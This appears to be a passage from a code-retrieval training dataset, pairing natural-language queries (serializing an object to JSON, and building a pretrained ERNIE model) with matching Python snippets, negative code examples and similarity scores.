[ "0.7564989", "0.7524423", "0.7510748", "0.7498424", "0.73834527", "0.72914463", "0.7283258", "0.72027653", "0.719384", "0.7186409", "0.7184023", "0.7142286", "0.7130274", "0.71298635", "0.70760477", "0.70056623", "0.6964983", "0.69032145", "0.6894841", "0.68800247", "0.68678236", "0.6847591", "0.6843833", "0.68348813", "0.68032765", "0.679861", "0.6798262", "0.6720903", "0.6690633", "0.6689964", "0.6677139", "0.6624427", "0.65918225", "0.6574339", "0.6560529", "0.6547985", "0.6539195", "0.6530564", "0.64931387", "0.6428627", "0.6394444", "0.63378525", "0.6309431", "0.6280412", "0.6279953", "0.62666106", "0.6265662", "0.622406", "0.620244", "0.6182493", "0.6137575", "0.61345685", "0.61309725", "0.6082461", "0.60441476", "0.6035278", "0.5993141", "0.59876525", "0.59876525", "0.59718966", "0.5950343", "0.58973724", "0.5882149", "0.58103275", "0.5804133", "0.5800102", "0.579282", "0.5775148", "0.5751955", "0.5677118", "0.56623507", "0.5648066", "0.5630775", "0.5629104", "0.5625677", "0.5623185", "0.56020373", "0.56003517", "0.5594286", "0.55793524", "0.5549726", "0.55081326", "0.54752016", "0.54591656", "0.5457591", "0.5453111", "0.5452253", "0.5451286", "0.5443524", "0.54417264", "0.5432796", "0.5410906", "0.5402593", "0.5376072", "0.53671324", "0.5366137", "0.5365206", "0.5359972", "0.5359588", "0.53583986" ]
0.7553281
1
Implementation to serialize the ``o`` argument.
def default(self, o: Decimal) -> Union[int, float]: if isinstance(o, Decimal): # NOTE: The below is potentially a HUGE MISTAKE and an # unnecessary OVER ENGINEERING! but this works. This is # not required as such because we can get around this by # converting everything to float by default but it makes # more sense to return response of ints as int and float as # float. return int(o) if float(o).is_integer() else float(o) return super().default(o)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serialize(self, obj):\n pass", "def serialize(obj):\n return serialization_manager.serialize(obj)", "def serialize(self, obj):\n return obj", "def serialize(obj):\n return pickle.dumps(obj)", "def serialize_forstorage(cls, obj):\n return misc.serialize_forstorage(obj)", "def serialize(self, obj):\n return json.dumps(obj)", "def to_serializable(o: Any) -> Any:\n if isinstance(o, UUID):\n return str(o)\n if isinstance(o, datetime):\n return isoformat(o)\n if is_dataclass(o):\n return asdict(o)\n if hasattr(o, \"__json__\"):\n return o.__json__()\n if hasattr(o, \"to_dict\"):\n # api_client models all have a to_dict function\n return o.to_dict()\n if isinstance(o, BaseModel):\n return o.dict()\n raise TypeError(f\"Could not serialize object of type {o.__class__.__name__} to JSON\")", "def default(self, o):\n raise TypeError(repr(o) + \" is not JSON serializable\")", "def default(self, o):\n raise TypeError(\"%r is not JSON serializable\" % (o,))", "def default(self, o):\r\n raise TypeError(repr(o) + \" is not JSON serializable\")", "def serialize(cls, obj):\n return json.dumps(obj, cls=CustomTypeEncoder)", "def save_object(o, fn):\n return dump_object(o, fn)", "def serialize(self, data):", "def serialize(obj):\n\n # if isinstance(obj, date):\n # serial = obj.isoformat()\n # return serial\n #\n # if isinstance(obj, time):\n # serial = obj.isoformat()\n # return serial\n\n return obj.to_json()", "def json_dumps(o: Any) -> bytes:\n return json.dumps(\n o, indent=4, sort_keys=True, ensure_ascii=True, separators=(\",\", \": \"), cls=NumberEncoder\n ).encode(\"ascii\")", "def _serialize(\n self, value: typing.Any, attr: str | None, obj: typing.Any, **kwargs\n ):\n return value", "def encode(self, o):\n # Our encoding prepends an 'x:' prefix.\n return b'x:%s' % str(o.name).encode('utf-8')", "def encode(self, o):\n # Our encoding prepends an 'x:' prefix.\n return b'x:%s' % str(o.name).encode('utf-8')", "def serialize(obj):\n\n if isinstance(obj, datetime.datetime):\n serial = obj.replace(microsecond=0).replace(tzinfo=None).isoformat() + \"Z\"\n return serial\n\n if isinstance(obj, bytes):\n return obj.decode('utf-8')\n\n return obj.__dict__", "def serialize(obj):\n\n if isinstance(obj, datetime.datetime):\n serial = obj.replace(microsecond=0).replace(tzinfo=None).isoformat() + \"Z\"\n return serial\n\n if isinstance(obj, bytes):\n return obj.decode('utf-8')\n\n return obj.__dict__", "def serialize(obj):\n serial = repr(obj)\n try:\n if eval(serial) == obj:\n return serial\n except:\n pass\n try:\n serial = pickle.dumps(obj)\n return 'pickle.loads(%s)' % repr(serial)\n except:\n raise Exception #unable to serialize", "def json_serial(obj):\r\n\r\n\t\tif isinstance(obj,(datetime, date)):\r\n\t\t\treturn obj.isoformat()\r\n\t\traise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return str(obj) #.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def serialize(self, obj, for_read=False):\n\n serializer = self.get_serializer()\n return serializer.serialize(obj.to_python(for_read=for_read))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n if isinstance(obj, complex):\n return str(obj)\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial2(self, obj):\n if isinstance(obj, (datetime.datetime, datetime.date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def serializer(obj):\n if 
isinstance(obj, datetime):\n return obj.strftime(ISO_TIME_FORMAT)\n else:\n raise TypeError('%s is not serializable' % obj)", "def _json_serialize(obj: Any) -> str:\n if isinstance(obj, bytes):\n if len(obj) < 256:\n try:\n return obj.hex()\n except Exception:\n pass\n else:\n try:\n return obj.decode()\n except Exception:\n pass\n return '<not serializable>'", "def json_serial(obj):\n\n\tif isinstance(obj, (dt.datetime, dt.date)):\n\t\treturn obj.isoformat()\n\traise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\r\n\r\n if isinstance(obj, (datetime, date)):\r\n return obj.isoformat()\r\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def serialize(self, obj):\n return dill.dumps(obj, 0).decode('latin-1')", "def serialize(value, **kwargs):\n return value", "def _serialize(\n obj: object,\n to_proto: bool = True,\n to_bytes: bool = False,\n) -> Union[str, bytes, Message]:\n\n is_serializable: Serializable\n if not isinstance(obj, Serializable):\n if hasattr(obj, \"serializable_wrapper_type\"):\n is_serializable = obj.serializable_wrapper_type(value=obj) # type: ignore\n else:\n traceback_and_raise(\n Exception(f\"Object {type(obj)} has no serializable_wrapper_type\")\n )\n else:\n is_serializable = obj\n\n serialize_method = getattr(is_serializable, \"sy_serialize\", None)\n if serialize_method is None:\n serialize_method = getattr(is_serializable, \"serialize\", None)\n if serialize_method is None:\n raise Exception(f\"Object {type(obj)} has no serialize method\")\n\n return serialize_method(to_proto=to_proto, to_bytes=to_bytes)", "def serialize_datetime(self, obj):\r\n if isinstance(obj, datetime.datetime):\r\n return obj.isoformat()\r\n raise TypeError(\"Type not serializable\")", "def dump_payload(self, obj):\n return want_bytes(self.serializer.dumps(obj, **self.serializer_kwargs))", "def _serialize(obj, args, kwargs):\n curried = _curry_callable(obj, args, kwargs)\n return cPickle.dumps(curried, protocol=cPickle.HIGHEST_PROTOCOL)", "def serialize(file_location, obj):\n if obj is None:\n raise ValueError('ERROR: Can not serialize when object to serialize is None')\n with open(file_location, 'wb') as file:\n pickle.dump(obj, file=file)", "def serialize(self):\n pass", "def json_serial(obj):\n if isinstance(obj, LegipyModel):\n return obj.to_json()\n elif isinstance(obj, (datetime.date, datetime.datetime)):\n return obj.isoformat()\n raise TypeError(\"Type {0} not serializable\".format(repr(type(obj))))", "def serialize(self):", "def dump_object(self, value):\n return pickle.dumps(value)", "def serialize(self, data):\n raise NotImplementedError", "def pack(self, obj):\n # TODO: use a JSON encoder that handles more types?\n if obj is not None:\n return json.dumps(obj)", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date,date)):\n return obj.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def dumps(self, 
obj):\n # Most of the work is done in _serialize, but we have to tack on\n # the stop instruction after it all.\n return self.serialize(obj) + '.'", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def SerializeObject(self, data):\n\n if isinstance(data,dict):\n serializad_data = json.dumps(data)\n else:\n serializad_data = json.dumps(data.__dict__)\n\n return serializad_data", "def json_serial(obj):\n if isinstance(obj, (datetime.datetime, datetime.date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n if isinstance(obj, (dt.datetime, dt.date)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def _to_serialize(value):\n return value.serialize() if value is not None else None", "def json_serial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n\n elif isinstance(obj, decimal.Decimal):\n if obj % 1 == 0:\n return int(obj)\n else:\n return float(obj)\n\n elif isinstance(obj, bytes):\n try:\n s = obj.decode()\n return s\n except Exception:\n return str(obj)\n\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def serialize(self, data):\r\n if data is None:\r\n return None\r\n elif type(data) is dict:\r\n return serializer.Serializer(\r\n self.get_attr_metadata()).serialize(data, self.content_type())\r\n else:\r\n raise Exception(_(\"Unable to serialize object of type = '%s'\") %\r\n type(data))", "def di_pickle(o):\n\tif o == None:\n\t\treturn \"None\"\n\tt = type(o)\n\tif t is types.IntType or t is types.LongType:\n\t\treturn \"i%d\" % o\n\tif t is types.BooleanType:\n\t\tif o:\n\t\t\treturn \"i1\"\n\t\telse:\n\t\t\treturn \"i0\"\n\tif t is types.FloatType:\n\t\treturn \"d%f\" % o\n\tif t is types.StringType:\n\t\treturn \"s'%s'\" % o.replace(\"'\", \"\\\\'\")\n\tif t is types.ListType:\n\t\treturn \"L(%s)\" % \"\".join([ di_pickle(x) for x in o])\n\tif isinstance(o, HashableList):\n\t\treturn \"L(%s)\" % \"\".join([ di_pickle(x) for x in o.list])\n\tif t is types.TupleType:\n\t\treturn \"T(%s)\" % \"\".join([ di_pickle(x) for x in o])\n\tif isinstance(o, (set, frozenset)):\n\t\treturn \"S(%s)\" % \"\".join([ di_pickle(x) for x in o])\n\tif t is types.DictType or isinstance(o, ImmutableDict):\n\t\treturn \"D(%s)\" % \"\".join([ \"%s%s\" % (di_pickle(k), di_pickle(v)) for k, v in o.items()])\n\traise \"Unsupported type in di_pickle()\", str(t)", "def jsonSerial(obj):\n\n if isinstance(obj, (datetime, date)):\n return obj.isoformat()\n\n if isinstance(obj, enum.Enum):\n return obj.value\n\n raise TypeError (\"Type %s not serializable\" % type(obj))", "def json_serial(obj):\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n raise TypeError (\"Type not serializable\")", "def json_serial(obj):\n\n if isinstance(obj, (datetime)):\n return obj.isoformat()\n raise TypeError(\"Type %s not serializable\" % type(obj))", "def default(self, o): # pylint: disable=E0202\n # E0202 ignored in favor of compliance with documentation:\n # https://docs.python.org/2/library/json.html#json.JSONEncoder.default\n try:\n return repr(o)\n except Exception: # 
pylint: disable=W0703\n return super(FailProofJSONEncoder, self).default(o)", "def serialize(obj, *args):\n value = obj(*args) if callable(obj) else obj\n return value.isoformat() if isinstance(value, (date, datetime)) else value", "def json_serial(obj):\n\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n raise TypeError (\"Type not serializable\")", "def do(self, obj):\n if isinstance(obj, str):\n return 'st__' + obj\n\n if type(obj) in literals:\n return obj\n\n # Now check for list, set, and tuple, and skip if they don't contain\n # any non-literals\n if type(obj) in builtin_iterables:\n if all(isinstance(x, literals) for x in flattened(obj)):\n return as_nested_lists(obj)\n\n oid = id(obj)\n if oid in self._working:\n raise GlueSerializeError(\"Circular reference detected\")\n self._working.add(oid)\n\n fun, version = self._dispatch(obj)\n logging.debug(\"Serializing %s with %s\", obj, fun)\n result = fun(obj, self)\n\n if isinstance(obj, types.FunctionType):\n result['_type'] = 'types.FunctionType'\n elif isinstance(obj, types.MethodType):\n result['_type'] = 'types.MethodType'\n else:\n result['_type'] = \"%s.%s\" % (type(obj).__module__,\n type(obj).__name__)\n if version > 1:\n result['_protocol'] = version\n\n self._working.remove(oid)\n return result", "def default(self, o):\n if isinstance(o, np.ndarray):\n return o.tolist()\n if isinstance(o, np.int64):\n return int(o)\n if isinstance(o, np.int32):\n return int(o)\n if isinstance(o, abc.ABCMeta):\n return str(o)\n return json.JSONEncoder.default(self, o)", "def serialize_obj(obj, filename):\n\n f = open(filename, 'wb')\n pickle.dump(obj, f)\n f.close()", "def json_serial(obj):\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n raise TypeError(\"Type not serializable\")", "def jdump(obj: t.Any, **kwargs) -> None:\n tools.jdump(obj=obj, **kwargs)", "def json_serial(obj):\n\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n raise TypeError(\"Type not serializable\")", "def json_serial(obj):\n\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n raise TypeError(\"Type not serializable\")", "def getValueAsString(self, o: ghidra.util.graph.KeyedObject) -> unicode:\n ...", "def dump_object(self, value):\n t = type(value)\n if t is int or t is long:\n return str(value)\n return '!' 
+ pickle.dumps(value)", "def serialize_str(self, obj):\n if len(obj) < 0x100:\n return 'U' + struct.pack('<B', len(obj)) + obj\n return 'T' + struct.pack('<I', len(obj)) + obj", "def toJSON(cls, obj):\n return json.dumps(obj)", "def _serialize(self, state, handle):\n raise NotImplementedError", "def encode(self, obj):\n # type: (List[List[Any]]) -> str\n raise NotImplementedError()", "def _serialize(self, instance, owner):\n val = instance.__dict__[self._name]\n if val is None: return None\n return str(val)", "def dumps(self, obj, salt=None):\n payload = want_bytes(self.dump_payload(obj))\n rv = self.make_signer(salt).sign(payload)\n if self.is_text_serializer:\n rv = rv.decode(\"utf-8\")\n return rv", "def object_to_param_str(obj):\n return b64encode(compress(cPickle.dumps(obj))).decode('utf8')", "def _serialize(self, value, attr, obj, **kwargs) -> str | _T | None:\n if value is None:\n return None\n ret = self._format_num(value) # type: _T\n return self._to_string(ret) if self.as_string else ret", "def dumps_value(obj):\n type_key = type_keys.Value.assign(obj)\n\n if type_key == type_keys.Value.INTEGER:\n binary_data = struct.pack(\"!q\", obj)\n elif type_key == type_keys.Value.FLOAT:\n binary_data = struct.pack(\"!d\", obj)\n elif type_key == type_keys.Value.COMPLEX:\n binary_data = struct.pack(formats.COMPLEX_PACK, obj.real, obj.imag)\n elif type_key == type_keys.Value.NUMPY_OBJ:\n binary_data = common.data_to_binary(obj, np.save)\n elif type_key == type_keys.Value.STRING:\n binary_data = obj.encode(common.ENCODE)\n elif type_key in (type_keys.Value.NULL, type_keys.Value.CASE_DEFAULT):\n binary_data = b\"\"\n elif type_key == type_keys.Value.PARAMETER_VECTOR:\n binary_data = common.data_to_binary(obj, _write_parameter_vec)\n elif type_key == type_keys.Value.PARAMETER:\n binary_data = common.data_to_binary(obj, _write_parameter)\n elif type_key == type_keys.Value.PARAMETER_EXPRESSION:\n binary_data = common.data_to_binary(obj, _write_parameter_expression)\n else:\n raise exceptions.QpyError(f\"Serialization for {type_key} is not implemented in value I/O.\")\n\n return type_key, binary_data", "def stringify(self, *args, **kwargs):\n return json.dumps(self.serialize(*args, **kwargs), default=SerialClass.string_repr)", "def JsonComplexEncoder(obj):\n if isinstance(obj, bytes):\n return str(obj)\n else:\n return obj", "def serialisation_tournoi(tournoi):\n serialized_tournoi = {\n \"nom\": tournoi.nom,\n \"lieu\": tournoi.lieu,\n \"dates\": tournoi.dates,\n \"nb tours prevus\": tournoi.nombre_tours_prevus,\n \"id_participants\": tournoi.joueurs_id,\n \"tours_effectues\": tournoi.nb_tour_en_cours,\n \"tours_db\": tournoi.tours_db,\n \"description\": tournoi.description,\n \"type\": tournoi.type,\n \"id\": tournoi.id,\n \"en_cours\": tournoi.en_cours\n }\n return serialized_tournoi", "def iterencode(self, o):\n if self.check_circular:\n markers = {}\n else:\n markers = None\n return self._iterencode(o, markers)", "def serialize_obj(obj: Any) -> Any:\n if isinstance(obj, (datetime.date, datetime.datetime)):\n return obj.isoformat()\n else:\n return obj", "def serialize_obj(obj: Any) -> Any:\n if isinstance(obj, (datetime.date, datetime.datetime)):\n return obj.isoformat()\n else:\n return obj", "def serialise(obj):\n if isinstance(obj, datetime.datetime):\n # maybe assume UTC (as deserialise does the reverse)\n return obj.replace(tzinfo=du_tz.tzutc()).isoformat()\n\n if isinstance(obj, datetime.date):\n return obj.isoformat()\n\n if isinstance(obj, queue.Queue):\n return {}\n\n if 
isinstance(obj, (pagination.PaginatedResponse, BaseObject)):\n return obj.to_dict()\n\n try:\n return obj.to_dict()\n except AttributeError:\n pass\n\n raise TypeError(\"Object of type '%s' is not JSON serializable\" % obj.__class__.__name__)", "def serialize(self, value) -> bytes:\n pass", "def serialize(self) -> str:\n pass", "def format(self, obj):\n pass", "def format(self, obj):\n pass", "def serialize(self, data):\n return data", "def serialize(self, buff):\n try:\n length = len(self.objects)\n buff.write(_struct_I.pack(length))\n for val1 in self.objects:\n _v1 = val1.header\n buff.write(_struct_I.pack(_v1.seq))\n _v2 = _v1.stamp\n _x = _v2\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n _x = _v1.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.object_class\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.confidence))\n _v3 = val1.roi\n _x = _v3\n buff.write(_struct_4IB.pack(_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def default(self, o):\n if isinstance(o, datetime):\n return o.strftime('%Y-%m-%d %H:%M:%S%z')\n\n if isinstance(o, Message):\n return MessageToDict(o)\n\n # if isinstance(o, RepeatedCompositeContainer):\n # return list(o)\n\n return super(CustomEncoder, self).default(o)", "def dumps(obj, *args, **kwargs): \n defaults = {\"indent\": 4}\n defaults.update(kwargs)\n return json.dumps(serialize(obj), *args, **defaults)", "def json_serial(obj):\n\n if isinstance(obj, datetime):\n serial = obj.isoformat()\n return serial\n # return unix_time_millis(obj)\n raise TypeError(\"Type not serializable\")", "def serialize(self, buff):\n try:\n _x = self\n buff.write(_get_struct_h16fh8f().pack(_x.id, _x.age, _x.velocidad_relativa_x, _x.velocidad_relativa_y, _x.velocidad_absoluta_x, _x.velocidad_absoluta_y, _x.velocidad_absoluta_sigma_x, _x.velocidad_absoluta_sigma_y, _x.bounding_box_centro_x, _x.bounding_box_centro_y, _x.bounding_box_largo, _x.bounding_box_ancho, _x.object_box_centro_x, _x.object_box_centro_y, _x.object_box_orientacion, _x.object_box_size_x, _x.object_box_size_y, _x.clasificacion, _x.clasificacion_age, _x.clasificacion_certeza, _x.punto_cercano_x, _x.punto_cercano_y, _x.punto_referencia_x, _x.punto_referencia_y, _x.punto_referencia_sigma_x, _x.punto_referencia_sigma_y))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def dump(self, obj):\r\n return self.localpath.dump(obj)" ]
[ "0.76455027", "0.71864474", "0.71055853", "0.6807475", "0.6794227", "0.66385746", "0.66352147", "0.6566663", "0.65611637", "0.6546735", "0.6452253", "0.64283395", "0.63991266", "0.6386263", "0.63441694", "0.6334144", "0.6327756", "0.6327756", "0.6322545", "0.6322545", "0.63178676", "0.6299019", "0.6292506", "0.626825", "0.6258309", "0.6231637", "0.62236816", "0.62229973", "0.62024564", "0.6165685", "0.61639166", "0.61574274", "0.6148288", "0.6138519", "0.6121005", "0.611452", "0.6103508", "0.60955274", "0.6093845", "0.6083734", "0.6079324", "0.6074728", "0.60744536", "0.6039429", "0.60343325", "0.60343325", "0.60343325", "0.60343325", "0.60147154", "0.6003486", "0.6001114", "0.6001114", "0.6000731", "0.59976256", "0.5977198", "0.5975042", "0.5965438", "0.5948937", "0.594336", "0.5935585", "0.59328234", "0.59253323", "0.5923617", "0.591571", "0.59151995", "0.59128404", "0.5908176", "0.5902367", "0.58947015", "0.5894053", "0.58773", "0.58773", "0.58755046", "0.5875384", "0.58579797", "0.58533055", "0.58516395", "0.5837387", "0.5830134", "0.58028543", "0.5794657", "0.5787738", "0.5773677", "0.57720083", "0.57577085", "0.57575226", "0.5756353", "0.57550466", "0.57550466", "0.5754975", "0.57514536", "0.5739093", "0.5730289", "0.5730289", "0.5729034", "0.5726566", "0.5718635", "0.57171315", "0.5708703", "0.5705437", "0.56987906" ]
0.0
-1
Fundamental pretrained ERNIE model
def __init__(self, cfg, name=''): nn.Layer.__init__(self) self.cfg = cfg d_model = cfg['hidden_size'] d_emb = cfg.get('emb_size', cfg['hidden_size']) d_vocab = cfg['vocab_size'] d_pos = cfg['max_position_embeddings'] # d_sent = cfg.get("sent_type_vocab_size", 4) or cfg.get('type_vocab_size', 4) if cfg.get('sent_type_vocab_size'): d_sent = cfg['sent_type_vocab_size'] else: d_sent = cfg.get('type_vocab_size', 2) self.n_head = cfg['num_attention_heads'] self.return_additional_info = cfg.get('return_additional_info', False) self.initializer = nn.initializer.TruncatedNormal(std=cfg['initializer_range']) self.ln = _build_ln(d_model, name=append_name(name, 'pre_encoder')) self.word_emb = nn.Embedding(d_vocab, d_emb, weight_attr=paddle.ParamAttr(name=append_name(name, 'word_embedding'), initializer=self.initializer)) self.pos_emb = nn.Embedding(d_pos, d_emb, weight_attr=paddle.ParamAttr(name=append_name(name, 'pos_embedding'), initializer=self.initializer)) # self.sent_emb = nn.Embedding( # d_sent, # d_emb, # weight_attr=paddle.ParamAttr(name=append_name(name, 'sent_embedding'), initializer=self.initializer)) self._use_sent_id = cfg.get('use_sent_id', True) self._use_sent_id = False if self._use_sent_id: self.sent_emb = nn.Embedding(d_sent, d_emb, weight_attr=paddle.ParamAttr(name=append_name(name, 'sent_embedding'), initializer=self.initializer)) self._use_task_id = cfg.get('use_task_id', False) self._use_task_id = False if self._use_task_id: self._task_types = cfg.get('task_type_vocab_size', 3) logging.info('using task_id, #task_types:{}'.format(self._task_types)) self.task_emb = nn.Embedding(self._task_types, d_emb, weight_attr=paddle.ParamAttr(name=append_name(name, 'task_embedding'), initializer=self.initializer)) prob = cfg['hidden_dropout_prob'] self.dropout = nn.Dropout(p=prob) self.encoder_stack = ErnieEncoderStack(cfg, append_name(name, 'encoder')) if cfg.get('has_pooler', True): self.pooler = _build_linear(cfg['hidden_size'], cfg['hidden_size'], append_name(name, 'pooled_fc'), self.initializer) else: self.pooler = None self.key_tag = None self._checkpoints = [] self.train()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pretrained():\n launch_training_on_all_splits(experiment='full', splits=NAME_SPLIT, base_model='pretrained', dropout=0.7987, learning_rate=0.00009659)", "def load_pretrained_model(model_name):\n if model_name==\"AlexNet\":\n print(\"Loading pretrained AlexNet Model\")\n model_ft = models.alexnet(pretrained=True)\n\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, 100)\n elif model_name==\"ResNet18\":\n print(\"Loading pretrained ResNet18 Model\")\n model_ft = models.resnet18(pretrained=True)\n\n for param in model_ft.parameters(): # Code for fixing the Conv Layer\n param.requires_grad = False # During Training Conv layer does not learn.\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, 100)\n elif model_name==\"ResNet50\":\n print(\"Loading pretrained ResNet50 Model\")\n\n model_ft = models.resnet50(pretrained=True)\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, 100)\n elif model_name==\"DenseNet\":\n print(\"Loading pretrained DenseNet161 Model\")\n model_ft = models.densenet161(pretrained=True)\n\n for param in model_ft.parameters():# Code for fixing the Conv Layer\n param.requires_grad = False\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, 100)\n\n if cfg.load_model_true:\n model_ft.load_state_dict(torch.load(cfg.load_model_path))\n\n return model_ft", "def resnet34(pretrained=False, **kwargs):\n model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)\n # model_dict = model.state_dict()\n\n if pretrained:\n # pretrained_dict=model_zoo.load_url(model_urls['resnet34'],model_dir='/home/FENGsl/JBHI/Pretrain_model')\n # pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}\n # model_dict.update(pretrained_dict)\n model.load_state_dict(model_zoo.load_url(model_urls['resnet34'], model_dir='/home/FENGsl/JBHI/Pretrain_model'))\n print('===> Pretrain Model Have Been Loaded, Please fasten your seat belt and get ready to take off!')\n return model", "def evaluate(args):\n dataset_param_filepath = os.path.join(args.model, 'dataset.params')\n dataset_params = putils.load_params(dataset_param_filepath)\n source_vocab_filepath = os.path.join(args.model, 'source.vocab')\n source_vocab = Vocab(vocab_filepath=source_vocab_filepath)\n target_vocab_filepath = os.path.join(args.model, 'target.vocab')\n target_vocab = Vocab(vocab_filepath=target_vocab_filepath)\n model_params_filepath = os.path.join(args.model, 'model.params')\n model_params = putils.load_params(model_params_filepath)\n checkpoint_filepath = os.path.join(args.model, 'checkpoint.tar')\n if not torch.cuda.is_available() and model_params['cuda']:\n logger.info('Loading a GPU-trained model on CPU')\n checkpoint = torch.load(checkpoint_filepath,\n map_location=const.DEVICE)\n elif torch.cuda.is_available() and model_params['cuda']:\n logger.info('Loading a GPU-trained model on GPU')\n checkpoint = torch.load(checkpoint_filepath)\n elif torch.cuda.is_available() and not model_params['cuda']:\n logger.info('Loading a CPU-trained model on GPU')\n checkpoint = torch.load(checkpoint_filepath,\n map_location='cuda:0')\n else:\n logger.info('Loading a CPU-trained model on CPU')\n checkpoint = torch.load(checkpoint_filepath)\n encoder = Encoder(model_type=checkpoint['encoder']['model_type'],\n 
input_size=checkpoint['encoder']['input_size'],\n hidden_size=checkpoint['encoder']['hidden_size'],\n num_layers=checkpoint['encoder']['num_layers'],\n nonlinearity=checkpoint['encoder']['nonlinearity'],\n bias=checkpoint['encoder']['bias'],\n dropout=checkpoint['encoder']['dropout'],\n bidirectional=checkpoint['encoder']['bidirectional'])\n if checkpoint['with_attention']:\n decoder = Attention(model_type=checkpoint['decoder']['model_type'],\n hidden_size=checkpoint['decoder']['hidden_size'],\n output_size=checkpoint['decoder']['output_size'],\n max_seq_len=dataset_params['max_seq_len'],\n num_layers=checkpoint['decoder']['num_layers'],\n nonlinearity=checkpoint['decoder']['nonlinearity'],\n bias=checkpoint['decoder']['bias'],\n dropout=checkpoint['decoder']['dropout'],\n bidirectional=checkpoint['decoder']['bidirectional'])\n else:\n decoder = Decoder(model_type=checkpoint['decoder']['model_type'],\n hidden_size=checkpoint['decoder']['hidden_size'],\n output_size=checkpoint['decoder']['output_size'],\n num_layers=checkpoint['decoder']['num_layers'],\n nonlinearity=checkpoint['decoder']['nonlinearity'],\n bias=checkpoint['decoder']['bias'],\n dropout=checkpoint['decoder']['dropout'],\n bidirectional=checkpoint['decoder']['bidirectional'])\n encoder.load_state_dict(checkpoint['encoder_state_dict'])\n decoder.load_state_dict(checkpoint['decoder_state_dict'])\n if torch.cuda.is_available():\n encoder.to(const.DEVICE)\n decoder.to(const.DEVICE)\n encoder.eval()\n decoder.eval()\n indexes = putils.index_dataset(\n args.data, source_vocab.item2idx, target_vocab.item2idx,\n dataset_params['is_character_based'], dataset_params['max_seq_len'],\n dataset_params['is_reversed'])\n if args.random > 0:\n random.shuffle(indexes)\n for seq_num in range(args.random):\n seq = indexes[seq_num]\n print('-'*80)\n print('>', ' '.join([source_vocab.idx2item[idx]\n for idx in seq[0]]))\n print('=', ' '.join([target_vocab.idx2item[idx]\n for idx in seq[1]]))\n # TODO: add support for OOV\n predicted_idx, _ = _decode(seq[0], encoder, decoder,\n checkpoint['with_attention'],\n dataset_params['max_seq_len'])\n print('<', ' '.join([target_vocab.idx2item[idx]\n for idx in predicted_idx]))\n else:\n _evaluate(indexes, encoder, decoder, target_vocab, checkpoint,\n dataset_params)", "def _load_model_from_trained_params(self):\n self.ent_emb = tf.constant(self.trained_model_params[0])\n self.rel_emb = tf.constant(self.trained_model_params[1])", "def load_model():\n \n _files = training_file()\n \n predictor_path = 